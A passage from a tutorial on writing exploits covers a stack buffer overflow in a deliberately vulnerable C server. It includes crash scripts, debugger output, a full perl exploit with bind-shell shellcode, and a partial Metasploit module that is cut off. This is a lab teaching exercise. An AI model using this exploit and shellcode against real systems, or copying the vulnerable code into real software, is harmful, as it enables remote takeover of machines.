In the first parts of the exploit writing tutorial, I have discussed some common vulnerabilities that can lead to 2 types of exploits : stack based buffer overflows (with direct EIP overwrite), and stack based buffer overflows that take advantage of SEH chains. In my examples, I have used perl to demonstrate how to build a working exploit.<\/p>\n
Obviously, writing exploits is not limited to perl only. I guess every programming language could be used to write exploits\u2026 so you can just pick the one that you are most familiar with. (python, c, c++, C#, etc)<\/p>\n
Despite the fact that these custom written exploits will work just fine, it may be nice to be able to include your own exploits in the metasploit framework in order to take advantage of some of the unique metasploit features.<\/p>\n
So today, I\u2019m going to explain how exploits can be written as a metasploit module.<\/p>\n
Metasploit modules are writting in ruby. Even if you don\u2019t know a lot about ruby, you should still be able to write a metasploit exploit module based on this tutorial and the existing exploits available in metasploit.<\/p>\n
A typical metasploit exploit module consists of the following components :<\/p>\n
You can put comments in your metasploit module by using the # character. That\u2019s all we need to know for now, let\u2019s look at the steps to build a metasploit exploit module.<\/p>\n
We\u2019ll use the following vulnerable server code (C) to demonstrate the building process :<\/p>\n
#include <iostream.h>\n#include <winsock.h>\n#include <windows.h>\n\n\/\/load windows socket<\/span>\n#pragma comment(lib, "wsock32.lib<\/span>")\n\n\/\/Define Return Messages<\/span>\n#define SS_ERROR 1\n#define SS_OK 0\n\nvoid<\/span> pr( char<\/span> *str)\n{\n char<\/span> buf[500]="<\/span>";\n strcpy<\/span>(buf,str);\n}\nvoid<\/span> sError(char<\/span> *str)\n{\n MessageBox (NULL, str, "socket Error<\/span>" ,MB_OK);\n WSACleanup();\n}\n\nint<\/span> main(int<\/span> argc, char<\/span> **argv)\n{\n\nWORD sockVersion;\nWSADATA wsaData;\n\nint<\/span> rVal;\nchar<\/span> Message[5000]="<\/span>";\nchar<\/span> buf[2000]="<\/span>";\n\nu_short LocalPort;\nLocalPort = 200;\n\n\/\/wsock32 initialized for usage<\/span>\nsockVersion = MAKEWORD(1,1);\nWSAStartup(sockVersion, &wsaData);\n\n\/\/create server socket<\/span>\nSOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);\n\nif<\/span>(serverSocket == INVALID_SOCKET)\n{\n sError("Failed socket()<\/span>");\n return<\/span> SS_ERROR;\n}\n\nSOCKADDR_IN sin<\/span>;\nsin<\/span>.sin_family = PF_INET;\nsin<\/span>.sin_port = htons(LocalPort);\nsin<\/span>.sin_addr.s_addr = INADDR_ANY;\n\n\/\/bind the socket<\/span>\nrVal = bind(serverSocket, (LPSOCKADDR)&sin<\/span>, sizeof<\/span>(sin<\/span>));\nif<\/span>(rVal == SOCKET_ERROR)\n{\n sError("Failed bind()<\/span>");\n WSACleanup();\n return<\/span> SS_ERROR;\n}\n\n\/\/get socket to listen<\/span>\nrVal = listen(serverSocket, 10);\nif<\/span>(rVal == SOCKET_ERROR)\n{\n sError("Failed listen()<\/span>");\n WSACleanup();\n return<\/span> SS_ERROR;\n}\n\n\/\/wait for a client to connect<\/span>\nSOCKET clientSocket;\nclientSocket = accept(serverSocket, NULL, NULL);\nif<\/span>(clientSocket == INVALID_SOCKET)\n{\n sError("Failed accept()<\/span>");\n WSACleanup();\n return<\/span> SS_ERROR;\n}\n\nint<\/span> bytesRecv = SOCKET_ERROR;\nwhile<\/span>( bytesRecv == SOCKET_ERROR )\n{\n \/\/receive the data that is being sent by the client max limit to 5000 bytes.<\/span>\n bytesRecv = recv( clientSocket, Message, 5000, 0 );\n\n if<\/span> ( bytesRecv == 0 || bytesRecv == WSAECONNRESET )\n {\n printf<\/span>( "\\nConnection Closed.\\n<\/span>");\n break<\/span>;\n }\n}\n\n\/\/Pass the data received to the function pr<\/span>\npr(Message);\n\n\/\/close client socket<\/span>\nclosesocket(clientSocket);\n\/\/close server socket<\/span>\nclosesocket(serverSocket);\n\nWSACleanup();\n\nreturn<\/span> SS_OK;\n}<\/pre>\n <\/pre>\n<\/p>\n
Compile the code and run it on a Windows 2003 server R2 with SP2. (I have used lcc-win32 to compile the code)<\/p>\n
When you send 1000 bytes to the server, the server will crash.<\/p>\n
The following perl script demonstrates the crash :<\/p>\n
<\/p>\n
use<\/span> strict;\nuse<\/span> Socket;\nmy<\/span> $junk = "\\x41<\/span>" x1000;\n\n# initialize host and port\nmy<\/span> $host = shift<\/span> || 'localhost';\nmy<\/span> $port = shift<\/span> || 200;\n\nmy<\/span> $proto = getprotobyname<\/span>('tcp');\n\n# get the port address\nmy<\/span> $iaddr = inet_aton($host);\nmy<\/span> $paddr = sockaddr_in($port, $iaddr);\n\nprint<\/span> "[+] Setting up socket\\n<\/span>";\n# create the socket<\/span>, connect<\/span> to the port\nsocket<\/span>(SOCKET, PF_INET, SOCK_STREAM, $proto) or die<\/span> "socket: $!<\/span>";\nprint<\/span> "[+] Connecting to $host on port $port\\n<\/span>";\nconnect<\/span>(SOCKET, $paddr) or die<\/span> "connect: $!<\/span>";\n\nprint<\/span> "[+] Sending payload\\n<\/span>";\nprint<\/span> SOCKET $junk."\\n<\/span>";\n\nprint<\/span> "[+] Payload sent\\n<\/span>";\n\nclose<\/span> SOCKET or die<\/span> "close: $!<\/span>";<\/pre>\nThe vulnerable server dies, and EIP gets overwritten with A\u2019s<\/p>\n
0:001> g\n(e00.de0): Access violation - code c0000005 (first chance)\nFirst chance exceptions are reported before any exception handling.\nThis exception may be expected and handled.\neax=0012e05c ebx=7ffd6000 ecx=00000000 edx=0012e446 esi=0040bdec edi=0012ebe0\neip=41414141 esp=0012e258 ebp=41414141 iopl=0 nv up ei pl nz ac po nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212\n41414141 ?? ???<\/pre>\nUsing a metasploit pattern, we determine that the offset to EIP overwrite is at 504 bytes. So we\u2019ll build a new crash script to verify the offset and see the contents of the registers when the overflow occurs :<\/p>\n
<\/p>\n
use strict;\nuse Socket;\n\nmy $totalbuffer=1000;\nmy $junk = "\\x41<\/span>" x 504;\nmy $eipoverwrite = "\\x42<\/span>" x 4;\nmy $junk2 = "\\x43<\/span>" x ($totalbuffer-length($junk.$eipoverwrite));\n\n# initialize host and port\nmy $host = shift || 'localhost';\nmy $port = shift || 200;\n\nmy $proto = getprotobyname('tcp');\n\n# get the port address\nmy $iaddr = inet_aton($host);\nmy $paddr = sockaddr_in($port, $iaddr);\n\nprint "[+] Setting up socket\\n<\/span>";\n# create the socket, connect to the port\nsocket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!<\/span>";\nprint "[+] Connecting to $host on port $port\\n<\/span>";\nconnect(SOCKET, $paddr) or die "connect: $!<\/span>";\n\nprint "[+] Sending payload\\n<\/span>";\nprint SOCKET $junk.$eipoverwrite.$junk2."\\n<\/span>";\n\nprint "[+] Payload sent\\n<\/span>";\n\nclose<\/span> SOCKET or die "close: $!<\/span>";<\/pre>\nAfter sending 504 A\u2019s, 4 B\u2019s and a bunch of C\u2019s, we can see the following register and stack contents :<\/p>\n
<\/p>\n
0:001> g\n(ed0.eb0): Access violation - code c0000005 (first chance)\nFirst chance exceptions are reported before any exception handling.\nThis exception may be expected and handled.\neax=0012e05c ebx=7ffde000 ecx=00000000 edx=0012e446 esi=0040bdec edi=0012ebe0\neip=42424242 esp=0012e258 ebp=41414141 iopl=0 nv up ei pl nz ac po nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212\n42424242 ?? ???\n0:000> d esp\n0012e258 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC\n0012e268 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC\n0012e278 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC\n0012e288 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC\n0012e298 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC\n0012e2a8 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC\n0012e2b8 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC\n0012e2c8 43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43 CCCCCCCCCCCCCCCC<\/pre>\nIncrease the junk size to see how much space you have available for your shellcode. This is important because you will need to specify this parameter in the metasploit module.<\/p>\n
Change the $totalbuffer value to 2000, overflow still works as expected, and the contents of esp indicate that we have been able to fill memory with C\u2019s up to esp+5d3 (1491 bytes). That will be our shellcode space (more or less)<\/p>\n
All we need is to overwrite EIP with jmp esp (or call esp, or something similar), and put our shellcode instead of the C\u2019s and we should be fine.<\/p>\n
Using findjmp, we have found a working address for our Windows 2003 R2 SP2 server :<\/p>\n
findjmp.exe ws2_32.dll esp\nReg: esp\nScanning ws2_32.dll for<\/span> code usable with the esp register<\/span>\n0x71C02B67 push esp - ret\nFinished Scanning ws2_32.dll for<\/span> code usable with the esp register<\/span>\nFound 1 usable addresses<\/pre>\nAfter doing some tests with shellcode, we can use the following conclusions to build the final exploits<\/p>\n
\n- exclude 0xff from the shellcode <\/li>\n
- put some nop\u2019s before the shellcode <\/li>\n<\/ul>\n
Our final exploit ( in perl, with a shell bound to tcp 5555 ) looks like this :<\/p>\n
<\/p>\n
#\nprint<\/span> " --------------------------------------\\n<\/span>";\nprint<\/span> " Writing Buffer Overflows\\n<\/span>";\nprint<\/span> " Peter Van Eeckhoutte\\n<\/span>";\nprint<\/span> " http:\/\/www.corelan.be:8800\\n<\/span>";\nprint<\/span> " --------------------------------------\\n<\/span>";\nprint<\/span> " Exploit for vulnserver.c\\n<\/span>";\nprint<\/span> " --------------------------------------\\n<\/span>";\nuse<\/span> strict;\nuse<\/span> Socket;\nmy<\/span> $junk = "\\x90<\/span>" x 504;\n\n#jmp esp (from ws2_32.dll)\nmy<\/span> $eipoverwrite = pack<\/span>('V',0x71C02B67);\n\n#add some NOP's\nmy<\/span> $shellcode="\\x90<\/span>" x 50;\n\n# windows\/shell_bind_tcp - 702 bytes\n# http:\/\/www.metasploit.com<\/span>\n# Encoder: x86\/alpha_upper\n# EXITFUNC=seh, LPORT=5555, RHOST=\n$shellcode=$shellcode."\\x89\\xe0\\xd9\\xd0\\xd9\\x70\\xf4\\x59\\x49\\x49\\x49\\x49\\x49\\x43<\/span>" .\n"\\x43\\x43\\x43\\x43\\x43\\x51\\x5a\\x56\\x54\\x58\\x33\\x30\\x56\\x58<\/span>" .\n"\\x34\\x41\\x50\\x30\\x41\\x33\\x48\\x48\\x30\\x41\\x30\\x30\\x41\\x42<\/span>" .\n"\\x41\\x41\\x42\\x54\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30<\/span>" .\n"\\x42\\x42\\x58\\x50\\x38\\x41\\x43\\x4a\\x4a\\x49\\x4b\\x4c\\x42\\x4a<\/span>" .\n"\\x4a\\x4b\\x50\\x4d\\x4d\\x38\\x4c\\x39\\x4b\\x4f\\x4b\\x4f\\x4b\\x4f<\/span>" .\n"\\x45\\x30\\x4c\\x4b\\x42\\x4c\\x51\\x34\\x51\\x34\\x4c\\x4b\\x47\\x35<\/span>" .\n"\\x47\\x4c\\x4c\\x4b\\x43\\x4c\\x43\\x35\\x44\\x38\\x45\\x51\\x4a\\x4f<\/span>" .\n"\\x4c\\x4b\\x50\\x4f\\x44\\x58\\x4c\\x4b\\x51\\x4f\\x47\\x50\\x43\\x31<\/span>" .\n"\\x4a\\x4b\\x47\\x39\\x4c\\x4b\\x46\\x54\\x4c\\x4b\\x43\\x31\\x4a\\x4e<\/span>" .\n"\\x50\\x31\\x49\\x50\\x4a\\x39\\x4e\\x4c\\x4c\\x44\\x49\\x50\\x42\\x54<\/span>" .\n"\\x45\\x57\\x49\\x51\\x48\\x4a\\x44\\x4d\\x45\\x51\\x48\\x42\\x4a\\x4b<\/span>" .\n"\\x4c\\x34\\x47\\x4b\\x46\\x34\\x46\\x44\\x51\\x38\\x42\\x55\\x4a\\x45<\/span>" .\n"\\x4c\\x4b\\x51\\x4f\\x51\\x34\\x43\\x31\\x4a\\x4b\\x43\\x56\\x4c\\x4b<\/span>" .\n"\\x44\\x4c\\x50\\x4b\\x4c\\x4b\\x51\\x4f\\x45\\x4c\\x43\\x31\\x4a\\x4b<\/span>" .\n"\\x44\\x43\\x46\\x4c\\x4c\\x4b\\x4b\\x39\\x42\\x4c\\x51\\x34\\x45\\x4c<\/span>" .\n"\\x45\\x31\\x49\\x53\\x46\\x51\\x49\\x4b\\x43\\x54\\x4c\\x4b\\x51\\x53<\/span>" .\n"\\x50\\x30\\x4c\\x4b\\x47\\x30\\x44\\x4c\\x4c\\x4b\\x42\\x50\\x45\\x4c<\/span>" .\n"\\x4e\\x4d\\x4c\\x4b\\x51\\x50\\x44\\x48\\x51\\x4e\\x43\\x58\\x4c\\x4e<\/span>" .\n"\\x50\\x4e\\x44\\x4e\\x4a\\x4c\\x46\\x30\\x4b\\x4f\\x4e\\x36\\x45\\x36<\/span>" .\n"\\x51\\x43\\x42\\x46\\x43\\x58\\x46\\x53\\x47\\x42\\x45\\x38\\x43\\x47<\/span>" .\n"\\x44\\x33\\x46\\x52\\x51\\x4f\\x46\\x34\\x4b\\x4f\\x48\\x50\\x42\\x48<\/span>" .\n"\\x48\\x4b\\x4a\\x4d\\x4b\\x4c\\x47\\x4b\\x46\\x30\\x4b\\x4f\\x48\\x56<\/span>" .\n"\\x51\\x4f\\x4c\\x49\\x4d\\x35\\x43\\x56\\x4b\\x31\\x4a\\x4d\\x45\\x58<\/span>" .\n"\\x44\\x42\\x46\\x35\\x43\\x5a\\x43\\x32\\x4b\\x4f\\x4e\\x30\\x45\\x38<\/span>" .\n"\\x48\\x59\\x45\\x59\\x4a\\x55\\x4e\\x4d\\x51\\x47\\x4b\\x4f\\x48\\x56<\/span>" .\n"\\x51\\x43\\x50\\x53\\x50\\x53\\x46\\x33\\x46\\x33\\x51\\x53\\x50\\x53<\/span>" .\n"\\x47\\x33\\x46\\x33\\x4b\\x4f\\x4e\\x30\\x42\\x46\\x42\\x48\\x42\\x35<\/span>" .\n"\\x4e\\x53\\x45\\x36\\x50\\x53\\x4b\\x39\\x4b\\x51\\x4c\\x55\\x43\\x58<\/span>" .\n"\\x4e\\x44\\x45\\x4a\\x44\\x30\\x49\\x57\\x46\\x37\\x4b\\x4f\\x4e\\x36<\/span>" .\n"\\x42\\x4a\\x44\\x50\\x50\\x51\\x50\\x55\\x4b\\x4f\\x48\\x50\\x45\\x38<\/span>" .\n"\\x49\\x34\\x4e\\x4d\\x46\\x4e\\x4a\\x49\\x50\\x57\\x4b\\x4f\\x49\\x46<\/span>" .\n"\\x46\\x33\\x50\\x55\\x4b\\x4f\\x4e\\x30\\x42\\x48\\x4d\\x35\\x51\\x59<\/span>" .\n"\\x4c\\x46\\x51\\x59\\x51\\x47\\x4b\\x4f\\x49\\x46\\x46\\x30\\x50\\x54<\/span>" .\n"\\x46\\x34\\x50\\x55\\x4b\\x4f\\x48\\x50\\x4a\\x33\\x43\\x58\\x4b\\x57<\/span>" .\n"\\x43\\x49\\x48\\x46\\x44\\x39\\x51\\x47\\x4b\\x4f\\x4e\\x36\\x46\\x35<\/span>" .\n"\\x4b\\x4f\\x48\\x50\\x43\\x56\\x43\\x5a\\x45\\x34\\x42\\x46\\x45\\x38<\/span>" .\n"\\x43\\x53\\x42\\x4d\\x4b\\x39\\x4a\\x45\\x42\\x4a\\x50\\x50\\x50\\x59<\/span>" .\n"\\x47\\x59\\x48\\x4c\\x4b\\x39\\x4d\\x37\\x42\\x4a\\x47\\x34\\x4c\\x49<\/span>" .\n"\\x4b\\x52\\x46\\x51\\x49\\x50\\x4b\\x43\\x4e\\x4a\\x4b\\x4e\\x47\\x32<\/span>" .\n"\\x46\\x4d\\x4b\\x4e\\x50\\x42\\x46\\x4c\\x4d\\x43\\x4c\\x4d\\x42\\x5a<\/span>" .\n"\\x46\\x58\\x4e\\x4b\\x4e\\x4b\\x4e\\x4b\\x43\\x58\\x43\\x42\\x4b\\x4e<\/span>" .\n"\\x48\\x33\\x42\\x36\\x4b\\x4f\\x43\\x45\\x51\\x54\\x4b\\x4f\\x48\\x56<\/span>" .\n"\\x51\\x4b\\x46\\x37\\x50\\x52\\x50\\x51\\x50\\x51\\x50\\x51\\x43\\x5a<\/span>" .\n"\\x45\\x51\\x46\\x31\\x50\\x51\\x51\\x45\\x50\\x51\\x4b\\x4f\\x4e\\x30<\/span>" .\n"\\x43\\x58\\x4e\\x4d\\x49\\x49\\x44\\x45\\x48\\x4e\\x46\\x33\\x4b\\x4f<\/span>" .\n"\\x48\\x56\\x43\\x5a\\x4b\\x4f\\x4b\\x4f\\x50\\x37\\x4b\\x4f\\x4e\\x30<\/span>" .\n"\\x4c\\x4b\\x51\\x47\\x4b\\x4c\\x4b\\x33\\x49\\x54\\x42\\x44\\x4b\\x4f<\/span>" .\n"\\x48\\x56\\x51\\x42\\x4b\\x4f\\x48\\x50\\x43\\x58\\x4a\\x50\\x4c\\x4a<\/span>" .\n"\\x43\\x34\\x51\\x4f\\x50\\x53\\x4b\\x4f\\x4e\\x36\\x4b\\x4f\\x48\\x50<\/span>" .\n"\\x41\\x41<\/span>";\n\n# initialize host and port\nmy<\/span> $host = shift<\/span> || 'localhost';\nmy<\/span> $port = shift<\/span> || 200;\n\nmy<\/span> $proto = getprotobyname<\/span>('tcp');\n\n# get the port address\nmy<\/span> $iaddr = inet_aton($host);\nmy<\/span> $paddr = sockaddr_in($port, $iaddr);\n\nprint<\/span> "[+] Setting up socket\\n<\/span>";\n# create the socket<\/span>, connect<\/span> to the port\nsocket<\/span>(SOCKET, PF_INET, SOCK_STREAM, $proto) or die<\/span> "socket: $!<\/span>";\nprint<\/span> "[+] Connecting to $host on port $port\\n<\/span>";\nconnect<\/span>(SOCKET, $paddr) or die<\/span> "connect: $!<\/span>";\n\nprint<\/span> "[+] Sending payload\\n<\/span>";\nprint<\/span> SOCKET $junk.$eipoverwrite.$shellcode."\\n<\/span>";\n\nprint<\/span> "[+] Payload sent\\n<\/span>";\nprint<\/span> "[+] Attempting to telnet to $host on port 5555...\\n<\/span>";\nsystem<\/span>("telnet $host 5555<\/span>");\n\nclose<\/span> SOCKET or die<\/span> "close: $!<\/span>";<\/pre>\nExploit output :<\/p>\n
root@backtrack4:\/tmp# perl sploit.pl 192.168.24.3 200\n --------------------------------------\n Writing Buffer Overflows\n Peter Van Eeckhoutte\n http:\/\/www.corelan.be:8800<\/span>\n --------------------------------------\n Exploit for vulnserver.c\n --------------------------------------\n[+] Setting up socket<\/span>\n[+] Connecting to 192.168.24.3 on port 200\n[+] Sending payload\n[+] Payload sent\n[+] Attempting to telnet to 192.168.24.3 on port 5555...\nTrying 192.168.24.3...\nConnected to 192.168.24.3.\nEscape character is '^]'.\nMicrosoft Windows [Version 5.2.3790]\n(C) Copyright 1985-2003 Microsoft Corp.\n\nC:\\vulnserver\\lcc>whoami\nwhoami\nwin2003-01\\administrator<\/pre>\nThe most important parameters that can be taken from this exploit are<\/p>\n
\n- offset to ret (eip overwrite) is 504 <\/li>\n
- windows 2003 R2 SP2 (English) jump address is 0x71C02B67 <\/li>\n
- shellcode should not contain 0x00 or 0xff <\/li>\n
- shellcode can be more or less 1400 bytes <\/li>\n<\/ul>\n
Futhermore, after running the same tests against a Windows XP SP3 (English), we determine that the offset is the same, but the jmp address must be changed (to for example 0x7C874413). We\u2019ll build a metasploit module that will allow you to select one of these 2 targets, and will use the correct jmp address.<\/p>\n
Converting the exploit to metasploit<\/h3>\n
First, you need to determine what type your exploit will be, because that will determine the place within the metasploit folder structure where the exploit will be saved. If your exploit is targetting a windows based ftp server, it would need to be placed under the windows ftp server exploits.<\/p>\n
Metasploit modules are saved in the framework3xx folder structure, under \/modules\/exploits. In that folder, the exploits are broken down into operating systems first, and then services.<\/em><\/p>\nOur server runs on windows, so we\u2019ll put it under windows. The windows fodler contains a number of folders already (from antivirus to wins), include a \u201cmisc\u201d folder. We\u2019ll put our exploit under \u201cmisc\u201d (or we could put it under telnet) because it does not really belong to any of the other types.<\/p>\n
We\u2019ll create our metasploit module under %metasploit%\/modules\/windows\/misc :<\/p>\n
<\/p>\n
root@backtrack4:\/# cd \/pentest\/exploits\/framework3\/modules\/exploits\/windows\/misc\nroot@backtrack4:\/pentest\/exploits\/framework3\/modules\/exploits\/windows\/misc# vi custom_vulnserver.rb<\/pre>\n <\/p>\n
<\/p>\n
#<\/span>\n#<\/span>\n# Custom metasploit exploit for vulnserver.c<\/span>\n# Written by Peter Van Eeckhoutte<\/span>\n#<\/span>\n#<\/span>\nrequire<\/span> 'msf\/core'\n\nclass<\/span> Metasploit3 < Msf::Exploit::Remote\n\n include Msf::Exploit::Remote::Tcp\n\n def<\/span> initialize(info = {})\n super<\/span>(update_info(info,\n 'Name' => 'Custom vulnerable server stack overflow',\n 'Description' => %q{\n This module<\/span> exploits a stack overflow in<\/span> a \n custom vulnerable server.\n },\n 'Author' => [ 'Peter Van Eeckhoutte' ],\n 'Version' => '$Revision: 9999 $',\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 1400,\n 'BadChars' => "\\x00\\xff<\/span>",\n },\n 'Platform' => 'win',\n\n 'Targets' =>\n [\n ['Windows XP SP3 En',\n { 'Ret' => 0x7c874413, 'Offset' => 504 } ],\n ['Windows 2003 Server R2 SP2',\n { 'Ret' => 0x71c02b67, 'Offset' => 504 } ],\n ],\n 'DefaultTarget' => 0,\n\n 'Privileged' => false<\/span>\n ))\n\n register_options(\n [\n Opt::RPORT(200)\n ], self<\/span>.class<\/span>)\n end<\/span>\n\n def<\/span> exploit\n connect\n\n junk = make_nops(target['Offset'])\n sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded\n sock.put(sploit)\n\n handler\n disconnect\n\n end<\/span>\n\n